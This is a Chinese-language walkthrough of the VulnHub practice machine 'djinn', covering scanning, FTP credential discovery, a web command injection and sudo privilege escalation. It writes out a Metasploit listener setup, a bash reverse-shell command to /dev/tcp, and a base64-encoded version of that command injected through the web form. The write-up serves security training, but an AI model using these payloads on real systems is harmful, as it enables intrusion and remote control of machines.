一、前言

通過大量vulnhub受控靶機(jī)積累一線攻防經(jīng)驗(yàn)和技巧。

二、環(huán)境

靶機(jī)名稱：djinn

靶機(jī)難度：初學(xué)者/中級(jí)

目標(biāo)：有兩個(gè)flag，user.txt and root.txt

攻擊機(jī)：kali linux，IP地址192.168.101.72

靶機(jī)：os-bytesec，IP地址192.168.101.156

三、挑戰(zhàn)過程

圖一

1.掃描IP提供的IT服務(wù)——

nmap -v -A -sV -T4 -p 1-65535 192.168.101.156

圖二

ftp服務(wù)探索

圖三

貌似是一些登錄憑據(jù)

圖四

可能有機(jī)會(huì)拿反彈shell

圖五

web目錄爆破

圖六

圖七

根據(jù)文章提示，wish這里有命令注入點(diǎn)

補(bǔ)充圖

補(bǔ)充圖

補(bǔ)充圖

監(jiān)聽準(zhǔn)備——

msfconsole

use exploit/multi/handler

set payload cmd/unix/reverse_bash

set lhost 192.168.101.72

set lport 4444

exploit

圖八

準(zhǔn)備個(gè)反彈shell命令——

bash -i >& /dev/tcp/192.168.101.72/4444 0>&1

轉(zhuǎn)成base64編碼——

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMS43Mi80NDQ0IDA+JjE=

圖九

在頁面輸入框中提交——

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMS43Mi80NDQ0IDA+JjE= | base64 -d | bash

拿到反彈shell，不是root，需要提權(quán)，先轉(zhuǎn)成交互式shell——

python -c 'import pty; pty.spawn("/bin/bash")'

在/home/nitish/.dev下發(fā)現(xiàn)用戶名密碼文件

圖十

獲取user.txt flag

圖十一

sudo提權(quán)-因管理員配置不當(dāng)

圖十二

獲取root flag

圖十三

四、總結(jié)

風(fēng)險(xiǎn)點(diǎn)：

1.ftp未授權(quán)訪問

2.web os命令注入點(diǎn)

3.明文密碼存儲(chǔ)服務(wù)器

4.sudo權(quán)限配置濫用

五、疑問點(diǎn)

1.【high】web OS命令注入點(diǎn)如何判斷？已解決【20220106】，看漏了，用burp看能更精準(zhǔn)把握細(xì)節(jié)，確實(shí)是命令注入。

2.【median】num的猜解太隨意，應(yīng)該是寫個(gè)腳本自動(dòng)化爆破嘗試

參考鏈接

1.http://www.hackdig.com/04/hack-314667.htm